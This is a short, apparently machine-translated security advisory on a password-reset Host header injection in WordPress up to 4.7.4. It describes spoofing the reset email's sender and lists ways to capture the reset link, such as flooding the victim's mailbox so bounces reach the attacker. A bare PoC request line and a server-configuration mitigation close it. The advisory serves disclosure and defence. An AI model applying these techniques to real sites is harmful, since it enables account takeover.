WordPress Version <= 4.7.4
Note: All current WordPress versions (including the latest version 4.7.4) are affected.
WordPress reset password function from the server to the user when the mailbox to send e-mail, if the attacker can get the contents of this message, you can reset the password link to modify the user password.
Use the same principle and the previous vulnerability, the attacker can request the header through the HOST “sender” mailbox is set to the attacker’s own address, under certain conditions can get the contents of this message and reset the user password.
The author gives three scenarios:
If the attacker knows the mailbox registered by the admin user in advance, the mailbox address can be attacked by DoS means (sending large file/attack DNS server), causing the password reset mail to be rejected or unable to be delivered. At this time, “Bounce” will be sent to the address constructed by the attacker.
The “autoresponder” feature of some mailboxes will return the contents of the message as an attachment to the sender.
Repeatedly sent to reset the password to the destination mailbox, forcing the user to reply to the situation, the contents of the reply will generally refer to the previous message body.
So far feel very difficult to use, see social workers who can give a new posture.
PoC HTTP Request
POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1
Temporary protection method
Currently WordPress official no related repair and update, the user can take the following temporary protection program:
The user can turn on UseCanonicalName to force the static SERVER_NAME value.
Reference link: http://ift.tt/2p8bQIS